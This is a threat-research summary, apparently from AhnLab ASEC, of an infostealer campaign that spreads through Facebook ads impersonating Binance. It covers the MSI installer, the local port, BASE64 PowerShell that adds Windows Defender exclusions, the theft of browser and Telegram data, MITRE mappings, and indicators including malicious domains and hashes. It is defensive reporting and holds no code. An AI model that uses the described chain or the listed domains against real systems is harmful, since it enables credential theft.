Threat Research

Malware Disguised as A Cryptocurrency Exchange Being Distributed Through Facebook Ads

Ahnlab
Malware Disguised as A Cryptocurrency Exchange Being Distributed Through Facebook Ads

AhnLab Security Intelligence Center (ASEC) uncovered malware distributed via Facebook ads targeting cryptocurrency users by impersonating a Binance exchange website. The malware installs via an “installer.msi” file, opens a local listening port, communicates with a command and control server, and executes an Infostealer to collect sensitive system and browser data. #Binance #FacebookAdsMalware #Infostealer

Keypoints

  • Malware is distributed through Facebook ads disguised as the Binance cryptocurrency exchange website.
  • Users downloading the “installer.msi” file unknowingly install malware that opens local port 30303 for remote communication.
  • The malware uses specific parameters to query registry GUIDs and collect system information via WMI queries.
  • If the infected system is non-virtual, the server triggers a PowerShell scheduler that downloads further malicious scripts.
  • The PowerShell scripts add scan exclusions in Windows Defender and download additional payloads from external domains.
  • The malware collects browser and Telegram data and performs malicious activities such as keylogging.
  • Security firms Bitdefender and WithSecure have also reported on this attack campaign.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – The malware executes PowerShell scripts encoded in BASE64 to download and run additional payloads (‘events in the “Application” log trigger the execution of a PowerShell script encoded in BASE64’).
  • [T1113] Screen Capture – The Infostealer captures screen information from the victim’s system (‘Infostealer that collects system information, screen captures, and browser information’).
  • [T1005] Data from Local System – Collects system information using WMI queries sent from the server (‘the server responds with a WMI query that retrieves system information’).
  • [T1071] Application Layer Protocol – The malware communicates with the command and control server through HTTP requests carrying parameters like /r and /worker (‘communication with a JavaScript loaded on the disguised website…’).
  • [T1140] Deobfuscate/Decode Files or Information – Uses BASE64 encoded PowerShell scripts to evade detection (‘PowerShell script encoded in BASE64’).

Indicators of Compromise

  • [File Hash] MD5 hashes of malicious installer files – 02c88f8b926d91ac248276fa629b75c2, 07997692c2129a707adb0d5b0b342aad, and 3 more hashes.
  • [Domain] Malicious domains used for command and control and payload downloads – binance-downloaad.com, binance[.]desktop-windows-pc[.]com, and additional related domains.
  • [File Name] Installer file name used for malware distribution – installer.msi.

Read more: https://asec.ahnlab.com/en/89383/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint